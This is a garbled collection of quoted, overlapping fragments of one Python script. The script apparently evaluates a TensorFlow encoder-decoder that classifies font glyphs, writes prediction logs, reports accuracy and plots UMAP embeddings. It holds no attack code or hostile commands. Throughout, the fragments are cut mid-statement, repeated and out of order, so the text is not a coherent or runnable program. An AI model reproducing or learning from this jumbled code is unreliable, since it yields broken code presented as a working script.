test_ds, epoch):", "} feature = self.encoder(input_data) outputs = self.decoder(feature) target_id = inputs['index']", "pred['pred_id2'][i][predid2])) elif predid > self.data.id_count + 1: txt.write('predict: id %d", "is None: self.init_epoch = int(os.path.basename(last).split('-')[1]) print('loaded %d epoch'%self.init_epoch) else: self.init_epoch", "else: txt.write('predict: id %d = %s (p=%f)\\n'%(predid, self.data.glyphs[predid-1], pred['pred_id1'][i][predid1] *", "net.FontData() print(\"Plot: \", self.init_epoch + 1) acc = self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch", "= tf.config.list_physical_devices('GPU') try: tf.config.experimental.set_memory_growth(physical_devices[0], True) except: # Invalid device or", "eval(): encoder = SimpleEncodeDecoder() encoder.eval() if __name__ == '__main__': eval()", "print(\"Plot: \", self.init_epoch + 1) acc = self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch +", "UMAP') X_reduced = umap.UMAP(metric='cosine').fit_transform(result) fig, ax = plt.subplots(figsize=(50, 50)) ax.scatter(X_reduced[:,", "return { 'feature': feature, 'pred_id1': pred_id1, 'pred_id2': pred_id2, 'target_id': target_id,", "= %d\\n'%failed_count) txt.write('accuracy = %f\\n'%acc) result = np.concatenate(result) labels =", "= self.decoder(feature) target_id = inputs['index'] target_id1 = inputs['idx1'] target_id2 =", "acc = correct_count / (correct_count + failed_count) txt.write('==============\\n') txt.write('Correct =", "test_ds, epoch): result = [] labels = [] with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w')", "labels = np.concatenate(labels) print('run UMAP') X_reduced = umap.UMAP(metric='cosine').fit_transform(result) fig, ax", "pass import numpy as np import os, time, csv import", "= 64 lr = tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5, 0.5) self.optimizer = tf.keras.optimizers.Adam(lr)", "feature_out = self.encoder(inputs) outputs = self.decoder(feature_out) self.model = tf.keras.Model(inputs, outputs,", "class SimpleEncodeDecoder: def __init__(self): self.save_dir = './result/step1/' self.result_dir = './result/plot/'", "inputs['idx1'] target_id2 = inputs['idx2'] pred_id1 = tf.nn.softmax(outputs['id1'], -1) pred_id2 =", "= self.encoder(input_data) outputs = self.decoder(feature) target_id = inputs['index'] target_id1 =", "= np.argmax(pred['pred_id1'][i]) predid2 = np.argmax(pred['pred_id2'][i]) predid = predid1 * 100", "= 0 failed_count = 0 with tqdm.tqdm(total=len(self.data.test_keys)) as pbar: for", "tf.keras.Model(inputs, outputs, name='SimpleEncodeDecoder') checkpoint = tf.train.Checkpoint(optimizer=self.optimizer, model=self.model) last = tf.train.latest_checkpoint(checkpoint_dir)", "pred['target_id'][i].numpy() txt.write('target: id %d = %s\\n'%(target, self.data.glyphs[target-1])) predid1 = np.argmax(pred['pred_id1'][i])", "target = pred['target_id'][i].numpy() txt.write('target: id %d = %s\\n'%(target, self.data.glyphs[target-1])) predid1", "pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) else: txt.write('predict: id %d = %s (p=%f)\\n'%(predid,", "print('run UMAP') X_reduced = umap.UMAP(metric='cosine').fit_transform(result) fig, ax = plt.subplots(figsize=(50, 50))", "= { 'image': tf.keras.Input(shape=(128,128,3)), } feature_out = self.encoder(inputs) outputs =", "labels = [] with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as txt: correct_count = 0", "= [] labels = [] with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as txt: correct_count", "#!/usr/bin/env python3 import tensorflow as tf physical_devices = tf.config.list_physical_devices('GPU') try:", "1) acc = self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch + 1)) print('acc', acc) @tf.function", "make_plot(self, test_ds, epoch): result = [] labels = [] with", "self.eval_substep(inputs) result += [pred['feature']] labels += [pred['target_id']] for i in", "failed_count += 1 pbar.update(1) acc = correct_count / (correct_count +", "acc = self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch + 1)) print('acc', acc) @tf.function def", "print('acc', acc) @tf.function def eval_substep(self, inputs): input_data = { 'image':", "correct_count += 1 else: txt.write('Failed!\\n') failed_count += 1 pbar.update(1) acc", "id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) else: txt.write('predict: id", "inputs in test_ds: pred = self.eval_substep(inputs) result += [pred['feature']] labels", "as plt import datetime import signal import net from matplotlib", "} def make_plot(self, test_ds, epoch): result = [] labels =", "in range(pred['target_id1'].shape[0]): txt.write('---\\n') target = pred['target_id'][i].numpy() txt.write('target: id %d =", "as pbar: for inputs in test_ds: pred = self.eval_substep(inputs) result", "0 self.model.summary() def eval(self): self.data = net.FontData() print(\"Plot: \", self.init_epoch", "'./result/step1/' self.result_dir = './result/plot/' os.makedirs(self.result_dir, exist_ok=True) checkpoint_dir = self.save_dir self.max_epoch", "net class SimpleEncodeDecoder: def __init__(self): self.save_dir = './result/step1/' self.result_dir =", "result += [pred['feature']] labels += [pred['target_id']] for i in range(pred['target_id1'].shape[0]):", "csv import tqdm import umap import matplotlib matplotlib.use('Agg') import matplotlib.pyplot", "import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import datetime import", "else: self.init_epoch = 0 self.model.summary() def eval(self): self.data = net.FontData()", "Maru Gothic Pro', 'Yu Gothic', 'Meirio', 'Takao', 'IPAexGothic', 'IPAPGothic', 'Noto", "(correct_count + failed_count) txt.write('==============\\n') txt.write('Correct = %d\\n'%correct_count) txt.write('Failed = %d\\n'%failed_count)", "inputs['input'], } feature = self.encoder(input_data) outputs = self.decoder(feature) target_id =", "tf.config.experimental.set_memory_growth(physical_devices[0], True) except: # Invalid device or cannot modify virtual", "Gothic', 'Meirio', 'Takao', 'IPAexGothic', 'IPAPGothic', 'Noto Sans CJK JP'] import", "once initialized. pass import numpy as np import os, time,", "0.5) self.optimizer = tf.keras.optimizers.Adam(lr) self.encoder = net.FeatureBlock() self.encoder.summary() self.decoder =", "'image': inputs['input'], } feature = self.encoder(input_data) outputs = self.decoder(feature) target_id", "self.decoder.summary() inputs = { 'image': tf.keras.Input(shape=(128,128,3)), } feature_out = self.encoder(inputs)", "def eval_substep(self, inputs): input_data = { 'image': inputs['input'], } feature", "in test_ds: pred = self.eval_substep(inputs) result += [pred['feature']] labels +=", "virtual devices once initialized. pass import numpy as np import", "self.data.glyphs[target-1])) predid1 = np.argmax(pred['pred_id1'][i]) predid2 = np.argmax(pred['pred_id2'][i]) predid = predid1", "self.data.id_count + 1: txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] *", "ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0], X_reduced[i,1])) plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300) plt.close('all') return acc def eval():", "id %d = %s (p=%f)\\n'%(predid, self.data.glyphs[predid-1], pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) if", "(p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) elif predid > self.data.id_count + 1:", "name='SimpleEncodeDecoder') checkpoint = tf.train.Checkpoint(optimizer=self.optimizer, model=self.model) last = tf.train.latest_checkpoint(checkpoint_dir) checkpoint.restore(last) self.manager", "= tf.keras.Model(inputs, outputs, name='SimpleEncodeDecoder') checkpoint = tf.train.Checkpoint(optimizer=self.optimizer, model=self.model) last =", "as txt: correct_count = 0 failed_count = 0 with tqdm.tqdm(total=len(self.data.test_keys))", "i in range(pred['target_id1'].shape[0]): txt.write('---\\n') target = pred['target_id'][i].numpy() txt.write('target: id %d", "txt.write('predict: id %d = %s (p=%f)\\n'%(predid, self.data.glyphs[predid-1], pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2]))", "def __init__(self): self.save_dir = './result/step1/' self.result_dir = './result/plot/' os.makedirs(self.result_dir, exist_ok=True)", "checkpoint, directory=checkpoint_dir, max_to_keep=2) if not last is None: self.init_epoch =", "(self.init_epoch + 1)) print('acc', acc) @tf.function def eval_substep(self, inputs): input_data", "as tf physical_devices = tf.config.list_physical_devices('GPU') try: tf.config.experimental.set_memory_growth(physical_devices[0], True) except: #", "= 1000 self.batch_size = 64 lr = tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5, 0.5)", "= pred['target_id'][i].numpy() txt.write('target: id %d = %s\\n'%(target, self.data.glyphs[target-1])) predid1 =", "id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) elif predid >", "import net from matplotlib import rcParams rcParams['font.family'] = 'sans-serif' rcParams['font.sans-serif']", "'image': tf.keras.Input(shape=(128,128,3)), } feature_out = self.encoder(inputs) outputs = self.decoder(feature_out) self.model", "= int(os.path.basename(last).split('-')[1]) print('loaded %d epoch'%self.init_epoch) else: self.init_epoch = 0 self.model.summary()", "pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) elif predid > self.data.id_count + 1: txt.write('predict:", "pbar.update(1) acc = correct_count / (correct_count + failed_count) txt.write('==============\\n') txt.write('Correct", "= 0 self.model.summary() def eval(self): self.data = net.FontData() print(\"Plot: \",", "import tqdm import umap import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as", "/ (correct_count + failed_count) txt.write('==============\\n') txt.write('Correct = %d\\n'%correct_count) txt.write('Failed =", "pred['pred_id2'][i][predid2])) else: txt.write('predict: id %d = %s (p=%f)\\n'%(predid, self.data.glyphs[predid-1], pred['pred_id1'][i][predid1]", "for i in range(pred['target_id1'].shape[0]): txt.write('---\\n') target = pred['target_id'][i].numpy() txt.write('target: id", "self.manager = tf.train.CheckpointManager( checkpoint, directory=checkpoint_dir, max_to_keep=2) if not last is", "rcParams rcParams['font.family'] = 'sans-serif' rcParams['font.sans-serif'] = ['Hiragino Maru Gothic Pro',", "+ 1) acc = self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch + 1)) print('acc', acc)", "'sans-serif' rcParams['font.sans-serif'] = ['Hiragino Maru Gothic Pro', 'Yu Gothic', 'Meirio',", "%d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) elif predid > self.data.id_count", "from matplotlib import rcParams rcParams['font.family'] = 'sans-serif' rcParams['font.sans-serif'] = ['Hiragino", "tf.train.latest_checkpoint(checkpoint_dir) checkpoint.restore(last) self.manager = tf.train.CheckpointManager( checkpoint, directory=checkpoint_dir, max_to_keep=2) if not", "Sans CJK JP'] import net class SimpleEncodeDecoder: def __init__(self): self.save_dir", "in enumerate(labels): ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0], X_reduced[i,1])) plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300) plt.close('all') return acc", "import tensorflow as tf physical_devices = tf.config.list_physical_devices('GPU') try: tf.config.experimental.set_memory_growth(physical_devices[0], True)", "epoch): result = [] labels = [] with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as", "%s\\n'%(target, self.data.glyphs[target-1])) predid1 = np.argmax(pred['pred_id1'][i]) predid2 = np.argmax(pred['pred_id2'][i]) predid =", "'target_id1': target_id1, 'target_id2': target_id2, } def make_plot(self, test_ds, epoch): result", "target_id1 = inputs['idx1'] target_id2 = inputs['idx2'] pred_id1 = tf.nn.softmax(outputs['id1'], -1)", "if not last is None: self.init_epoch = int(os.path.basename(last).split('-')[1]) print('loaded %d", "inputs): input_data = { 'image': inputs['input'], } feature = self.encoder(input_data)", "+ failed_count) txt.write('==============\\n') txt.write('Correct = %d\\n'%correct_count) txt.write('Failed = %d\\n'%failed_count) txt.write('accuracy", "txt.write('target: id %d = %s\\n'%(target, self.data.glyphs[target-1])) predid1 = np.argmax(pred['pred_id1'][i]) predid2", "predid1 = np.argmax(pred['pred_id1'][i]) predid2 = np.argmax(pred['pred_id2'][i]) predid = predid1 *", "tf.keras.optimizers.Adam(lr) self.encoder = net.FeatureBlock() self.encoder.summary() self.decoder = net.SimpleDecoderBlock() self.decoder.summary() inputs", "pbar: for inputs in test_ds: pred = self.eval_substep(inputs) result +=", "pred_id2 = tf.nn.softmax(outputs['id2'], -1) return { 'feature': feature, 'pred_id1': pred_id1,", "SimpleEncodeDecoder: def __init__(self): self.save_dir = './result/step1/' self.result_dir = './result/plot/' os.makedirs(self.result_dir,", "self.batch_size = 64 lr = tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5, 0.5) self.optimizer =", "checkpoint = tf.train.Checkpoint(optimizer=self.optimizer, model=self.model) last = tf.train.latest_checkpoint(checkpoint_dir) checkpoint.restore(last) self.manager =", "print('loaded %d epoch'%self.init_epoch) else: self.init_epoch = 0 self.model.summary() def eval(self):", "cannot modify virtual devices once initialized. pass import numpy as", "txt.write('==============\\n') txt.write('Correct = %d\\n'%correct_count) txt.write('Failed = %d\\n'%failed_count) txt.write('accuracy = %f\\n'%acc)", "%f\\n'%acc) result = np.concatenate(result) labels = np.concatenate(labels) print('run UMAP') X_reduced", "failed_count) txt.write('==============\\n') txt.write('Correct = %d\\n'%correct_count) txt.write('Failed = %d\\n'%failed_count) txt.write('accuracy =", "import signal import net from matplotlib import rcParams rcParams['font.family'] =", "'Takao', 'IPAexGothic', 'IPAPGothic', 'Noto Sans CJK JP'] import net class", "= np.concatenate(labels) print('run UMAP') X_reduced = umap.UMAP(metric='cosine').fit_transform(result) fig, ax =", "np.concatenate(labels) print('run UMAP') X_reduced = umap.UMAP(metric='cosine').fit_transform(result) fig, ax = plt.subplots(figsize=(50,", "np.concatenate(result) labels = np.concatenate(labels) print('run UMAP') X_reduced = umap.UMAP(metric='cosine').fit_transform(result) fig,", "'pred_id2': pred_id2, 'target_id': target_id, 'target_id1': target_id1, 'target_id2': target_id2, } def", "txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) elif predid", "-1) pred_id2 = tf.nn.softmax(outputs['id2'], -1) return { 'feature': feature, 'pred_id1':", "import rcParams rcParams['font.family'] = 'sans-serif' rcParams['font.sans-serif'] = ['Hiragino Maru Gothic", "X_reduced = umap.UMAP(metric='cosine').fit_transform(result) fig, ax = plt.subplots(figsize=(50, 50)) ax.scatter(X_reduced[:, 0],", "0], X_reduced[:, 1], c=labels, cmap=plt.get_cmap('hsv')) print('plot UMAP') for i, label", "pred_id1 = tf.nn.softmax(outputs['id1'], -1) pred_id2 = tf.nn.softmax(outputs['id2'], -1) return {", "target_id1, 'target_id2': target_id2, } def make_plot(self, test_ds, epoch): result =", "@tf.function def eval_substep(self, inputs): input_data = { 'image': inputs['input'], }", "tf physical_devices = tf.config.list_physical_devices('GPU') try: tf.config.experimental.set_memory_growth(physical_devices[0], True) except: # Invalid", "self.init_epoch + 1) acc = self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch + 1)) print('acc',", "initialized. pass import numpy as np import os, time, csv", "predid == 0: txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] *", "except: # Invalid device or cannot modify virtual devices once", "umap.UMAP(metric='cosine').fit_transform(result) fig, ax = plt.subplots(figsize=(50, 50)) ax.scatter(X_reduced[:, 0], X_reduced[:, 1],", "correct_count = 0 failed_count = 0 with tqdm.tqdm(total=len(self.data.test_keys)) as pbar:", "test_ds: pred = self.eval_substep(inputs) result += [pred['feature']] labels += [pred['target_id']]", "signal import net from matplotlib import rcParams rcParams['font.family'] = 'sans-serif'", "'Yu Gothic', 'Meirio', 'Takao', 'IPAexGothic', 'IPAPGothic', 'Noto Sans CJK JP']", "1], c=labels, cmap=plt.get_cmap('hsv')) print('plot UMAP') for i, label in enumerate(labels):", "outputs = self.decoder(feature) target_id = inputs['index'] target_id1 = inputs['idx1'] target_id2", "return acc def eval(): encoder = SimpleEncodeDecoder() encoder.eval() if __name__", "self.data.glyphs[predid-1], pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) if target == predid: txt.write('Correct!\\n') correct_count", "self.optimizer = tf.keras.optimizers.Adam(lr) self.encoder = net.FeatureBlock() self.encoder.summary() self.decoder = net.SimpleDecoderBlock()", "'./result/plot/' os.makedirs(self.result_dir, exist_ok=True) checkpoint_dir = self.save_dir self.max_epoch = 300 self.steps_per_epoch", "import umap import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import", "id %d = %s\\n'%(target, self.data.glyphs[target-1])) predid1 = np.argmax(pred['pred_id1'][i]) predid2 =", "= np.argmax(pred['pred_id2'][i]) predid = predid1 * 100 + predid2 if", "directory=checkpoint_dir, max_to_keep=2) if not last is None: self.init_epoch = int(os.path.basename(last).split('-')[1])", "1000 self.batch_size = 64 lr = tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5, 0.5) self.optimizer", "= tf.nn.softmax(outputs['id1'], -1) pred_id2 = tf.nn.softmax(outputs['id2'], -1) return { 'feature':", "txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) else: txt.write('predict:", "= plt.subplots(figsize=(50, 50)) ax.scatter(X_reduced[:, 0], X_reduced[:, 1], c=labels, cmap=plt.get_cmap('hsv')) print('plot", "devices once initialized. pass import numpy as np import os,", "failed_count = 0 with tqdm.tqdm(total=len(self.data.test_keys)) as pbar: for inputs in", "X_reduced[:, 1], c=labels, cmap=plt.get_cmap('hsv')) print('plot UMAP') for i, label in", "or cannot modify virtual devices once initialized. pass import numpy", "os, time, csv import tqdm import umap import matplotlib matplotlib.use('Agg')", "with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as txt: correct_count = 0 failed_count = 0", "outputs, name='SimpleEncodeDecoder') checkpoint = tf.train.Checkpoint(optimizer=self.optimizer, model=self.model) last = tf.train.latest_checkpoint(checkpoint_dir) checkpoint.restore(last)", "+= [pred['feature']] labels += [pred['target_id']] for i in range(pred['target_id1'].shape[0]): txt.write('---\\n')", "import datetime import signal import net from matplotlib import rcParams", "'Noto Sans CJK JP'] import net class SimpleEncodeDecoder: def __init__(self):", "\", self.init_epoch + 1) acc = self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch + 1))", "# Invalid device or cannot modify virtual devices once initialized.", "target == predid: txt.write('Correct!\\n') correct_count += 1 else: txt.write('Failed!\\n') failed_count", "open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as txt: correct_count = 0 failed_count = 0 with", "__init__(self): self.save_dir = './result/step1/' self.result_dir = './result/plot/' os.makedirs(self.result_dir, exist_ok=True) checkpoint_dir", "(X_reduced[i,0], X_reduced[i,1])) plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300) plt.close('all') return acc def eval(): encoder", "'Meirio', 'Takao', 'IPAexGothic', 'IPAPGothic', 'Noto Sans CJK JP'] import net", "lr = tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5, 0.5) self.optimizer = tf.keras.optimizers.Adam(lr) self.encoder =", "checkpoint.restore(last) self.manager = tf.train.CheckpointManager( checkpoint, directory=checkpoint_dir, max_to_keep=2) if not last", "acc def eval(): encoder = SimpleEncodeDecoder() encoder.eval() if __name__ ==", "self.model.summary() def eval(self): self.data = net.FontData() print(\"Plot: \", self.init_epoch +", "* pred['pred_id2'][i][predid2])) else: txt.write('predict: id %d = %s (p=%f)\\n'%(predid, self.data.glyphs[predid-1],", "= %s (p=%f)\\n'%(predid, self.data.glyphs[predid-1], pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) if target ==", "X_reduced[i,1])) plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300) plt.close('all') return acc def eval(): encoder =", "= 300 self.steps_per_epoch = 1000 self.batch_size = 64 lr =", "modify virtual devices once initialized. pass import numpy as np", "elif predid > self.data.id_count + 1: txt.write('predict: id %d nothing", "(p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) else: txt.write('predict: id %d = %s", "tensorflow as tf physical_devices = tf.config.list_physical_devices('GPU') try: tf.config.experimental.set_memory_growth(physical_devices[0], True) except:", "self.encoder.summary() self.decoder = net.SimpleDecoderBlock() self.decoder.summary() inputs = { 'image': tf.keras.Input(shape=(128,128,3)),", "= self.save_dir self.max_epoch = 300 self.steps_per_epoch = 1000 self.batch_size =", "(p=%f)\\n'%(predid, self.data.glyphs[predid-1], pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) if target == predid: txt.write('Correct!\\n')", "tf.train.Checkpoint(optimizer=self.optimizer, model=self.model) last = tf.train.latest_checkpoint(checkpoint_dir) checkpoint.restore(last) self.manager = tf.train.CheckpointManager( checkpoint,", "range(pred['target_id1'].shape[0]): txt.write('---\\n') target = pred['target_id'][i].numpy() txt.write('target: id %d = %s\\n'%(target,", "dpi=300) plt.close('all') return acc def eval(): encoder = SimpleEncodeDecoder() encoder.eval()", "pred['pred_id2'][i][predid2])) if target == predid: txt.write('Correct!\\n') correct_count += 1 else:", "predid2 = np.argmax(pred['pred_id2'][i]) predid = predid1 * 100 + predid2", "predid2 if predid == 0: txt.write('predict: id %d nothing (p=%f)\\n'%(predid,", "%d epoch'%self.init_epoch) else: self.init_epoch = 0 self.model.summary() def eval(self): self.data", "+ 1: txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2]))", "100 + predid2 if predid == 0: txt.write('predict: id %d", "= inputs['idx1'] target_id2 = inputs['idx2'] pred_id1 = tf.nn.softmax(outputs['id1'], -1) pred_id2", "0 failed_count = 0 with tqdm.tqdm(total=len(self.data.test_keys)) as pbar: for inputs", "%d = %s (p=%f)\\n'%(predid, self.data.glyphs[predid-1], pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) if target", "tqdm import umap import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt", "inputs = { 'image': tf.keras.Input(shape=(128,128,3)), } feature_out = self.encoder(inputs) outputs", "'feature': feature, 'pred_id1': pred_id1, 'pred_id2': pred_id2, 'target_id': target_id, 'target_id1': target_id1,", "%d = %s\\n'%(target, self.data.glyphs[target-1])) predid1 = np.argmax(pred['pred_id1'][i]) predid2 = np.argmax(pred['pred_id2'][i])", "'target_id2': target_id2, } def make_plot(self, test_ds, epoch): result = []", "None: self.init_epoch = int(os.path.basename(last).split('-')[1]) print('loaded %d epoch'%self.init_epoch) else: self.init_epoch =", "= tf.keras.optimizers.Adam(lr) self.encoder = net.FeatureBlock() self.encoder.summary() self.decoder = net.SimpleDecoderBlock() self.decoder.summary()", "%s (p=%f)\\n'%(predid, self.data.glyphs[predid-1], pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) if target == predid:", "last is None: self.init_epoch = int(os.path.basename(last).split('-')[1]) print('loaded %d epoch'%self.init_epoch) else:", "self.init_epoch = 0 self.model.summary() def eval(self): self.data = net.FontData() print(\"Plot:", "== predid: txt.write('Correct!\\n') correct_count += 1 else: txt.write('Failed!\\n') failed_count +=", "self.init_epoch = int(os.path.basename(last).split('-')[1]) print('loaded %d epoch'%self.init_epoch) else: self.init_epoch = 0", "tf.nn.softmax(outputs['id1'], -1) pred_id2 = tf.nn.softmax(outputs['id2'], -1) return { 'feature': feature,", "outputs = self.decoder(feature_out) self.model = tf.keras.Model(inputs, outputs, name='SimpleEncodeDecoder') checkpoint =", "def eval(): encoder = SimpleEncodeDecoder() encoder.eval() if __name__ == '__main__':", "self.encoder(input_data) outputs = self.decoder(feature) target_id = inputs['index'] target_id1 = inputs['idx1']", "= self.decoder(feature_out) self.model = tf.keras.Model(inputs, outputs, name='SimpleEncodeDecoder') checkpoint = tf.train.Checkpoint(optimizer=self.optimizer,", "for i, label in enumerate(labels): ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0], X_reduced[i,1])) plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300)", "+= 1 else: txt.write('Failed!\\n') failed_count += 1 pbar.update(1) acc =", "txt.write('Failed = %d\\n'%failed_count) txt.write('accuracy = %f\\n'%acc) result = np.concatenate(result) labels", "plt import datetime import signal import net from matplotlib import", "nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) elif predid > self.data.id_count +", "feature = self.encoder(input_data) outputs = self.decoder(feature) target_id = inputs['index'] target_id1", "Invalid device or cannot modify virtual devices once initialized. pass", "device or cannot modify virtual devices once initialized. pass import", "[] with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as txt: correct_count = 0 failed_count =", "self.steps_per_epoch = 1000 self.batch_size = 64 lr = tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5,", "+ 1)) print('acc', acc) @tf.function def eval_substep(self, inputs): input_data =", "predid = predid1 * 100 + predid2 if predid ==", "> self.data.id_count + 1: txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1]", "+= [pred['target_id']] for i in range(pred['target_id1'].shape[0]): txt.write('---\\n') target = pred['target_id'][i].numpy()", "rcParams['font.sans-serif'] = ['Hiragino Maru Gothic Pro', 'Yu Gothic', 'Meirio', 'Takao',", "= umap.UMAP(metric='cosine').fit_transform(result) fig, ax = plt.subplots(figsize=(50, 50)) ax.scatter(X_reduced[:, 0], X_reduced[:,", "* pred['pred_id2'][i][predid2])) if target == predid: txt.write('Correct!\\n') correct_count += 1", "else: txt.write('Failed!\\n') failed_count += 1 pbar.update(1) acc = correct_count /", "target_id = inputs['index'] target_id1 = inputs['idx1'] target_id2 = inputs['idx2'] pred_id1", "= %s\\n'%(target, self.data.glyphs[target-1])) predid1 = np.argmax(pred['pred_id1'][i]) predid2 = np.argmax(pred['pred_id2'][i]) predid", "nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) else: txt.write('predict: id %d =", "= 'sans-serif' rcParams['font.sans-serif'] = ['Hiragino Maru Gothic Pro', 'Yu Gothic',", "1: txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) else:", "64 lr = tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5, 0.5) self.optimizer = tf.keras.optimizers.Adam(lr) self.encoder", "= correct_count / (correct_count + failed_count) txt.write('==============\\n') txt.write('Correct = %d\\n'%correct_count)", "UMAP') for i, label in enumerate(labels): ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0], X_reduced[i,1])) plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch),", "['Hiragino Maru Gothic Pro', 'Yu Gothic', 'Meirio', 'Takao', 'IPAexGothic', 'IPAPGothic',", "= tf.nn.softmax(outputs['id2'], -1) return { 'feature': feature, 'pred_id1': pred_id1, 'pred_id2':", "== 0: txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2]))", "= net.FeatureBlock() self.encoder.summary() self.decoder = net.SimpleDecoderBlock() self.decoder.summary() inputs = {", "np.argmax(pred['pred_id1'][i]) predid2 = np.argmax(pred['pred_id2'][i]) predid = predid1 * 100 +", "result = np.concatenate(result) labels = np.concatenate(labels) print('run UMAP') X_reduced =", "'IPAexGothic', 'IPAPGothic', 'Noto Sans CJK JP'] import net class SimpleEncodeDecoder:", "} feature_out = self.encoder(inputs) outputs = self.decoder(feature_out) self.model = tf.keras.Model(inputs,", "enumerate(labels): ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0], X_reduced[i,1])) plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300) plt.close('all') return acc def", "inputs['index'] target_id1 = inputs['idx1'] target_id2 = inputs['idx2'] pred_id1 = tf.nn.softmax(outputs['id1'],", "if predid == 0: txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1]", "= ['Hiragino Maru Gothic Pro', 'Yu Gothic', 'Meirio', 'Takao', 'IPAexGothic',", "tf.train.CheckpointManager( checkpoint, directory=checkpoint_dir, max_to_keep=2) if not last is None: self.init_epoch", "matplotlib.use('Agg') import matplotlib.pyplot as plt import datetime import signal import", "pred = self.eval_substep(inputs) result += [pred['feature']] labels += [pred['target_id']] for", "int(os.path.basename(last).split('-')[1]) print('loaded %d epoch'%self.init_epoch) else: self.init_epoch = 0 self.model.summary() def", "tf.nn.softmax(outputs['id2'], -1) return { 'feature': feature, 'pred_id1': pred_id1, 'pred_id2': pred_id2,", "plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300) plt.close('all') return acc def eval(): encoder = SimpleEncodeDecoder()", "import net class SimpleEncodeDecoder: def __init__(self): self.save_dir = './result/step1/' self.result_dir", "0: txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) elif", "tf.keras.Input(shape=(128,128,3)), } feature_out = self.encoder(inputs) outputs = self.decoder(feature_out) self.model =", "if target == predid: txt.write('Correct!\\n') correct_count += 1 else: txt.write('Failed!\\n')", "labels += [pred['target_id']] for i in range(pred['target_id1'].shape[0]): txt.write('---\\n') target =", "* pred['pred_id2'][i][predid2])) elif predid > self.data.id_count + 1: txt.write('predict: id", "import os, time, csv import tqdm import umap import matplotlib", "max_to_keep=2) if not last is None: self.init_epoch = int(os.path.basename(last).split('-')[1]) print('loaded", "self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch + 1)) print('acc', acc) @tf.function def eval_substep(self, inputs):", "as np import os, time, csv import tqdm import umap", "txt.write('Failed!\\n') failed_count += 1 pbar.update(1) acc = correct_count / (correct_count", "umap import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import datetime", "tqdm.tqdm(total=len(self.data.test_keys)) as pbar: for inputs in test_ds: pred = self.eval_substep(inputs)", "time, csv import tqdm import umap import 